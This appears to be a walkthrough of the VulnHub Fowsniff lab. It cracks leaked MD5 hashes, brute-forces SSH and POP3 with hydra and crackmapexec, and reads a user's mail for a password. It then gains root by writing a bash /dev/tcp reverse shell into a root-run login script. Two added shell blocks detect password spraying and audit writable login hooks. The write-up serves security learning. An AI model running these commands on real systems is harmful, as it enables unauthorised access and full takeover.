FOWSNIFF: 1
https://www.vulnhub.com/entry/fowsniff-1,262/
Host discovery
# yunki @ yunki in ~/vulnhub/Fowsniff [12:12:52]
$ nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.5
Host is up (0.0097s latency).
Nmap scan
# yunki @ yunki in ~/vulnhub/Fowsniff [12:14:21]
$ sudo nmap --min-rate 10000 -p- 192.168.54.5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 12:14 CST
Nmap scan report for 192.168.54.5
Host is up (0.00028s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
143/tcp open imap
MAC Address: 00:0C:29:59:68:8D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.45 seconds
# yunki @ yunki in ~/vulnhub/Fowsniff [12:14:59]
$ sudo nmap -sT -sV -sC -O -p22,80,110,143 192.168.54.5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 12:15 CST
Nmap scan report for 192.168.54.5
Host is up (0.00054s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 903566f4c6d295121be8cddeaa4e0323 (RSA)
| 256 539d236734cf0ad55a9a1174bdfdde71 (ECDSA)
|_ 256 a28fdbae9e3dc9e6a9ca03b1d71b6683 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Fowsniff Corp - Delivering Solutions
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE SASL(PLAIN) USER UIDL PIPELINING CAPA TOP
143/tcp open imap Dovecot imapd
|_imap-capabilities: IDLE ENABLE Pre-login SASL-IR ID OK capabilities post-login more have listed AUTH=PLAINA0001 LOGIN-REFERRALS IMAP4rev1 LITERAL+
MAC Address: 00:0C:29:59:68:8D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.76 seconds
# yunki @ yunki in ~/vulnhub/Fowsniff [12:21:19] C:255
$ sudo nmap -sU -p22,80,110,143 192.168.54.5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 12:21 CST
Nmap scan report for 192.168.54.5
Host is up (0.00031s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
110/udp closed pop3
143/udp closed imap
MAC Address: 00:0C:29:59:68:8D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Web information gathering
Directory brute-forcing
# yunki @ yunki in ~/vulnhub/Fowsniff [12:15:37]
$ gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --url http://192.168.54.5 --no-error| tee gobuster.log
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.54.5
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/03/29 12:18:02 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 313] [--> http://192.168.54.5/images/]
/assets (Status: 301) [Size: 313] [--> http://192.168.54.5/assets/]
Progress: 85890 / 87665 (97.98%)
===============================================================
2023/03/29 12:18:20 Finished
===============================================================
Detailed directory brute-forcing (with file extensions)
gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --url http://192.168.54.5 --no-error -x php,html,txt,rar,zip,7z | tee gobuster.log
Save the file found above as leaked_data, then use john to crack the MD5 hashes.
# yunki @ yunki in ~/vulnhub/Fowsniff [14:00:13]
$ sudo john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt leaked_data
[sudo] yunki 的密码:
123456
对不起,请重试。
[sudo] yunki 的密码:
Using default input encoding: UTF-8
Loaded 9 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=8
1Press 'q' or Ctrl-C to abort, almost any other key for status
scoobydoo2 (seina@fowsniff)
orlando12 (parede@fowsniff)
apples01 (tegel@fowsniff)
skyler22 (baksteen@fowsniff)
mailcall (mauer@fowsniff)
07011972 (sciana@fowsniff)
carp4ever (mursten@fowsniff)
bilbo101 (mustikka@fowsniff)
8g 0:00:00:01 94.26% (ETA: 14:00:52) 7.547g/s 12811Kp/s 12811Kc/s 33885KC/s 09063658188..09062577566
8g 0:00:00:01 DONE (2023-03-29 14:00) 7.017g/s 12581Kp/s 12581Kc/s 32177KC/s fuckyooh21..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
Save the credential lines from the middle of that output to a file named cracked_creds. Split the file into username and password lists, then try brute-forcing the SSH login.
# yunki @ yunki in ~/vulnhub/Fowsniff [14:01:18]
$ cat cracked_creds|awk -F ' ' '{print $1}'
scoobydoo2
orlando12
apples01
skyler22
mailcall
07011972
carp4ever
bilbo101
# yunki @ yunki in ~/vulnhub/Fowsniff [14:04:50]
$ cat cracked_creds|awk -F ' ' '{print $1}' > password.txt
# yunki @ yunki in ~/vulnhub/Fowsniff [14:06:26]
$ cat cracked_creds|awk -F ' ' '{print $2}' | awk -F '(' '{print $2}' | awk -F '@' '{print $1}'
seina
parede
tegel
baksteen
mauer
sciana
mursten
mustikka
# yunki @ yunki in ~/vulnhub/Fowsniff [14:06:48]
$ cat cracked_creds|awk -F ' ' '{print $2}' | awk -F '(' '{print $2}' | awk -F '@' '{print $1}' > username.txt
hydra/crackmapexec SSH brute-forcing
# yunki @ yunki in ~/vulnhub/Fowsniff [14:08:59]
$ hydra -L username.txt -P password.txt 192.168.54.5 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-29 14:09:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 64 login tries (l:8/p:8), ~4 tries per task
[DATA] attacking ssh://192.168.54.5:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-29 14:09:31
# yunki @ yunki in ~/vulnhub/Fowsniff [14:09:31]
$ crackmapexec ssh 192.168.54.5 -u username.txt -p password.txt --continue-on-success
/usr/lib/python3/dist-packages/requests/__init__.py:87: RequestsDependencyWarning: urllib3 (1.26.12) or chardet (5.1.0) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "
SSH 192.168.54.5 22 192.168.54.5 [*] SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
SSH 192.168.54.5 22 192.168.54.5 [-] seina:scoobydoo2 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] seina:orlando12 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] seina:apples01 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] seina:skyler22 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] seina:mailcall Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] seina:07011972 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] seina:carp4ever Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] seina:bilbo101 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:scoobydoo2 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:orlando12 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:apples01 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:skyler22 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:mailcall Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:07011972 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:carp4ever Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:bilbo101 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:scoobydoo2 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:orlando12 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:apples01 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:skyler22 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:mailcall Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:07011972 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:carp4ever Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:bilbo101 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] baksteen:scoobydoo2 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] baksteen:orlando12 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] baksteen:apples01 Authentication failed.
hydra POP3 brute-forcing
# yunki @ yunki in ~/vulnhub/Fowsniff [14:15:17]
$ hydra -L username.txt -P password.txt 192.168.54.5 pop3 -f # exit when a login/pass pair is found
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-29 14:15:32
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 64 login tries (l:8/p:8), ~4 tries per task
[DATA] attacking pop3://192.168.54.5:110/
[110][pop3] host: 192.168.54.5 login: seina password: scoobydoo2
[STATUS] attack finished for 192.168.54.5 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-29 14:15:43
# In fact there is only one valid pair anyway.
# yunki @ yunki in ~/vulnhub/Fowsniff [14:15:53] C:255
$ hydra -L username.txt -P password.txt 192.168.54.5 pop3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-29 14:15:55
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 64 login tries (l:8/p:8), ~4 tries per task
[DATA] attacking pop3://192.168.54.5:110/
[110][pop3] host: 192.168.54.5 login: seina password: scoobydoo2
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-29 14:16:47
Found a valid user: host: 192.168.54.5 login: seina password: scoobydoo2
Log in over POP3.
# yunki @ yunki in ~/vulnhub/Fowsniff [14:18:02] C:1
$ sudo nc 192.168.54.5 110
+OK Welcome to the Fowsniff Corporate Mail Server!
user seina
+OK
pass scoobydoo2
+OK Logged in.
list
+OK 2 messages:
1 1622
2 1280
.
retr 1
+OK 1622 octets
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)
Dear All,
A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.
We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.
This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via
the SSH protocol.
The temporary password for SSH is "S1ck3nBluff+secureshell"
You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.
Come see me in my office at your earliest convenience and we'll set it up.
Thanks,
A.J Stone
.
retr 2
+OK 1280 octets
Return-Path: <baksteen@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: seina@fowsniff
Subject: You missed out!
Message-Id: <20180313185405.101CA1AC2@fowsniff>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: baksteen@fowsniff
Devin,
You should have seen the brass lay into AJ today!
We are going to be talking about this one for a looooong time hahaha.
Who knew the regional manager had been in the navy? She was swearing like a sailor!
I don't know what kind of pneumonia or something you brought back with
you from your camping trip, but I think I'm coming down with it myself.
How long have you been gone - a week?
Next time you're going to get sick and miss the managerial blowout of the century,
at least keep it to yourself!
I'm going to head home early and eat some chicken soup.
I think I just got an email from Stone, too, but it's probably just some
"Let me explain the tone of my meeting with management" face-saving mail.
I'll read it when I get back.
Feel better,
Skyler
PS: Make sure you change your email password.
AJ had been telling us to do that right before Captain Profanity showed up.
.
This reveals a key piece of information, The temporary password for SSH is "S1ck3nBluff+secureshell", along with some relationships between the people involved.
With a password and a list of users, try brute-forcing the SSH login.
# yunki @ yunki in ~/vulnhub/Fowsniff [14:25:34] C:2
$ crackmapexec ssh 192.168.54.5 -u username.txt -p "S1ck3nBluff+secureshell"
/usr/lib/python3/dist-packages/requests/__init__.py:87: RequestsDependencyWarning: urllib3 (1.26.12) or chardet (5.1.0) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "
SSH 192.168.54.5 22 192.168.54.5 [*] SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
SSH 192.168.54.5 22 192.168.54.5 [-] seina:S1ck3nBluff+secureshell Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:S1ck3nBluff+secureshell Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:S1ck3nBluff+secureshell Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [+] baksteen:S1ck3nBluff+secureshell
# yunki @ yunki in ~/vulnhub/Fowsniff [14:25:56]
$ hydra -L username.txt -p "S1ck3nBluff+secureshell" ssh://192.168.54.5
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-29 14:26:13
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:8/p:1), ~1 try per task
[DATA] attacking ssh://192.168.54.5:22/
[22][ssh] host: 192.168.54.5 login: baksteen password: S1ck3nBluff+secureshell
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-29 14:26:16
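The hydra and crackmapexec runs above (the spray of cracked passwords earlier and the single temporary password here) leave a distinctive trail in sshd's log: one source failing against many different usernames, where a user mistyping their own password fails against one name only. As an added example that is not part of the original walkthrough, this POSIX shell function flags any source address whose failed logins span at least a given number of distinct usernames; the log lines are constructed, not captured from the box, and the 192.168.54.20 address is made up.

```shell
# Constructed sshd log lines (not captured from the box). Nine failures from
# 192.168.54.128 across eight usernames mimic the spray; 192.168.54.20 is a
# made-up address where one user mistypes a password twice, then logs in.
SAMPLE_AUTH_LOG='Mar 29 14:09:22 fowsniff sshd[3001]: Failed password for invalid user seina from 192.168.54.128 port 50110 ssh2
Mar 29 14:09:22 fowsniff sshd[3002]: Failed password for invalid user parede from 192.168.54.128 port 50111 ssh2
Mar 29 14:09:22 fowsniff sshd[3003]: Failed password for invalid user tegel from 192.168.54.128 port 50112 ssh2
Mar 29 14:09:23 fowsniff sshd[3004]: Failed password for baksteen from 192.168.54.128 port 50113 ssh2
Mar 29 14:09:23 fowsniff sshd[3005]: Failed password for invalid user mauer from 192.168.54.128 port 50114 ssh2
Mar 29 14:09:23 fowsniff sshd[3006]: Failed password for invalid user sciana from 192.168.54.128 port 50115 ssh2
Mar 29 14:09:24 fowsniff sshd[3007]: Failed password for invalid user mursten from 192.168.54.128 port 50116 ssh2
Mar 29 14:09:24 fowsniff sshd[3008]: Failed password for invalid user mustikka from 192.168.54.128 port 50117 ssh2
Mar 29 14:09:25 fowsniff sshd[3009]: Failed password for invalid user seina from 192.168.54.128 port 50118 ssh2
Mar 29 14:10:01 fowsniff sshd[3010]: Failed password for baksteen from 192.168.54.20 port 40001 ssh2
Mar 29 14:10:05 fowsniff sshd[3011]: Failed password for baksteen from 192.168.54.20 port 40002 ssh2
Mar 29 14:10:09 fowsniff sshd[3012]: Accepted password for baksteen from 192.168.54.20 port 40003 ssh2'

# Usage: detect_spray THRESHOLD < auth.log
# Prints "<source-ip> <failed-logins> <distinct-usernames>" for every source
# whose failed password attempts span at least THRESHOLD distinct usernames.
# Timing is ignored; a production rule would also bound the time window.
detect_spray() {
  awk -v threshold="$1" '
    /sshd\[[0-9]+\]: Failed password for / {
      user = ""; ip = ""
      for (i = 1; i <= NF; i++) {
        # sshd writes "for USER" or "for invalid user USER"; source follows "from"
        if ($i == "for") user = ($(i + 1) == "invalid") ? $(i + 3) : $(i + 1)
        if ($i == "from") ip = $(i + 1)
      }
      if (user == "" || ip == "") next
      fails[ip]++
      if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
    }
    END {
      for (ip in fails)
        if (users[ip] >= threshold) printf "%s %d %d\n", ip, fails[ip], users[ip]
    }'
}

# Stand-alone run over the sample: only 192.168.54.128 crosses five usernames.
printf '%s\n' "$SAMPLE_AUTH_LOG" | detect_spray 5
```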
Gaining initial access
# yunki @ yunki in ~/vulnhub/Fowsniff [14:26:16]
$ ssh baksteen@192.168.54.5
The authenticity of host '192.168.54.5 (192.168.54.5)' can't be established.
ECDSA key fingerprint is SHA256:5i4lzzyTeroRL7skmPatRi24vG1+59KMgqHGLyxre9Y.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.54.5' (ECDSA) to the list of known hosts.
baksteen@192.168.54.5's password:
_____ _ __ __
:sdddddddddddddddy+ | ___|____ _____ _ __ (_)/ _|/ _|
:yNMMMMMMMMMMMMMNmhsso | |_ / _ \ \ /\ / / __| '_ \| | |_| |_
.sdmmmmmNmmmmmmmNdyssssso | _| (_) \ V V /\__ \ | | | | _| _|
-: y. dssssssso |_| \___/ \_/\_/ |___/_| |_|_|_| |_|
-: y. dssssssso ____
-: y. dssssssso / ___|___ _ __ _ __
-: y. dssssssso | | / _ \| '__| '_ \
-: o. dssssssso | |__| (_) | | | |_) | _
-: o. yssssssso \____\___/|_| | .__/ (_)
-: .+mdddddddmyyyyyhy: |_|
-: -odMMMMMMMMMMmhhdy/.
.ohdddddddddddddho: Delivering Solutions
**** Welcome to the Fowsniff Corporate Server! ****
---------- NOTICE: ----------
* Due to the recent security breach, we are running on a very minimal system.
* Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.
New release '18.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue Mar 13 16:55:40 2018 from 192.168.7.36
baksteen@fowsniff:~$ whoami
baksteen
baksteen@fowsniff:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:59:68:8d brd ff:ff:ff:ff:ff:ff
inet 192.168.54.5/24 brd 192.168.54.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe59:688d/64 scope link
valid_lft forever preferred_lft forever
Privilege escalation
baksteen@fowsniff:~$ id
uid=1004(baksteen) gid=100(users) groups=100(users),1001(baksteen)
baksteen@fowsniff:~$ find / -group users -type f -not -path "/proc/*" 2>/dev/null
/opt/cube/cube.sh
/home/baksteen/.cache/motd.legal-displayed
/home/baksteen/Maildir/dovecot-uidvalidity
/home/baksteen/Maildir/dovecot.index.log
/home/baksteen/Maildir/new/1520967067.V801I23764M196461.fowsniff
/home/baksteen/Maildir/dovecot-uidlist
/home/baksteen/Maildir/dovecot-uidvalidity.5aa21fac
/home/baksteen/.viminfo
/home/baksteen/.bash_history
/home/baksteen/.lesshsQ
/home/baksteen/.bash_logout
/home/baksteen/term.txt
/home/baksteen/.profile
/home/baksteen/.bashrc
/sys/fs/cgroup/systemd/user.slice/user-1004.slice/user@1004.service/tasks
/sys/fs/cgroup/systemd/user.slice/user-1004.slice/user@1004.service/cgroup.procs
/sys/fs/cgroup/systemd/user.slice/user-1004.slice/user@1004.service/init.scope/tasks
/sys/fs/cgroup/systemd/user.slice/user-1004.slice/user@1004.service/init.scope/cgroup.procs
/sys/fs/cgroup/systemd/user.slice/user-1004.slice/user@1004.service/init.scope/cgroup.clone_children
/sys/fs/cgroup/systemd/user.slice/user-1004.slice/user@1004.service/init.scope/notify_on_release
The first hit, /opt/cube/cube.sh, is interesting right away: isn't that the banner that was just printed at SSH login? Write a reverse shell into it, start a listener at the same time, then log in over SSH again.
baksteen@fowsniff:~$ cat /opt/cube/cube.sh
printf "
_____ _ __ __
:sdddddddddddddddy+ | ___|____ _____ _ __ (_)/ _|/ _|
:yNMMMMMMMMMMMMMNmhsso | |_ / _ \ \ /\ / / __| '_ \| | |_| |_
.sdmmmmmNmmmmmmmNdyssssso | _| (_) \ V V /\__ \ | | | | _| _|
-: y. dssssssso |_| \___/ \_/\_/ |___/_| |_|_|_| |_|
-: y. dssssssso ____
-: y. dssssssso / ___|___ _ __ _ __
-: y. dssssssso | | / _ \| '__| '_ \
-: o. dssssssso | |__| (_) | | | |_) | _
-: o. yssssssso \____\___/|_| | .__/ (_)
-: .+mdddddddmyyyyyhy: |_|
-: -odMMMMMMMMMMmhhdy/.
.ohdddddddddddddho: Delivering Solutions\n\n"
baksteen@fowsniff:~$ echo "bash -c 'exec bash -i &>/dev/tcp/192.168.54.128/443 <&1'" > /opt/cube/cube.sh
baksteen@fowsniff:~$ ssh^C
baksteen@fowsniff:~$ exit
logout
Connection to 192.168.54.5 closed.
# yunki @ yunki in ~/vulnhub/Fowsniff [14:32:52] C:130
$ ssh baksteen@192.168.54.5
baksteen@192.168.54.5's password:
# yunki @ yunki in ~/vulnhub/Fowsniff [14:16:47]
$ sudo nc -lnvp 443
[sudo] yunki 的密码:
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.5] 42890
bash: cannot set terminal process group (3121): Inappropriate ioctl for device
bash: no job control in this shell
root@fowsniff:/# whoami
whoami
root
root@fowsniff:/# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:59:68:8d brd ff:ff:ff:ff:ff:ff
inet 192.168.54.5/24 brd 192.168.54.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe59:688d/64 scope link
valid_lft forever preferred_lft forever
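The escalation works because a script that root executes at login is writable by an ordinary member of the users group. As an added example, not the walkthrough's own code, this POSIX shell audit takes root-run login hooks (assumed to live under /etc/update-motd.d and /etc/profile.d, since the page does not show how cube.sh is invoked) and flags any hook, or any script a hook references, that is not root-owned or is group- or world-writable; it assumes GNU stat.

```shell
# Print "<file>: <reasons>" when FILE is unsafe to execute as root; print
# nothing when it is root-owned and writable by nobody but its owner.
# Assumes GNU stat (-c/-L); symlinks are resolved before checking.
unsafe_reasons() {
  f=$1
  info=$(stat -L -c '%A %U %G' "$f") || return 1   # e.g. "-rwxrwxr-x root users"
  set -- $info
  sym=$1 owner=$2 group=$3 reasons=""
  [ "$owner" = root ] || reasons="$reasons owner=$owner(not root)"
  # symbolic mode: chars 2-4 owner, 5-7 group, 8-10 other; 'w' at 6 and 9 = write
  case "$sym" in ?????w????) reasons="$reasons group-writable($group)" ;; esac
  case "$sym" in ????????w?) reasons="$reasons world-writable" ;; esac
  [ -z "$reasons" ] || printf '%s:%s\n' "$f" "$reasons"
  return 0
}

# List the absolute paths mentioned inside a hook script that exist as regular
# files, so a hook that merely calls /opt/cube/cube.sh still surfaces that script.
referenced_files() {
  grep -oE '/[A-Za-z0-9_./-]+' "$1" | sort -u |
    while read -r p; do [ -f "$p" ] && printf '%s\n' "$p"; done
  return 0
}

# Audit each hook plus everything it references. Findings go to stdout,
# one line per unsafe file; no output means nothing was flagged.
audit_login_hooks() {
  for hook in "$@"; do
    [ -f "$hook" ] || continue
    for f in "$hook" $(referenced_files "$hook"); do
      unsafe_reasons "$f"
    done
  done
  return 0
}

# Typical root-run login hooks on an Ubuntu host; missing paths are skipped.
audit_login_hooks /etc/update-motd.d/* /etc/profile.d/*.sh
```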
Getting the flag
root@fowsniff:/root# cd ~
cd ~
root@fowsniff:/root# cat flag.txt
cat flag.txt
___ _ _ _ _ _
/ __|___ _ _ __ _ _ _ __ _| |_ _ _| |__ _| |_(_)___ _ _ __| |
| (__/ _ \ ' \/ _` | '_/ _` | _| || | / _` | _| / _ \ ' \(_-<_|
\___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)
|___/
(_)
|--------------
|&&&&&&&&&&&&&&|
| R O O T |
| F L A G |
|&&&&&&&&&&&&&&|
|--------------
|
|
|
|
|
|
---
Nice work!
This CTF was built with love in every byte by @berzerk0 on Twitter.
Special thanks to psf, @nbulischeck and the whole Fofao Team.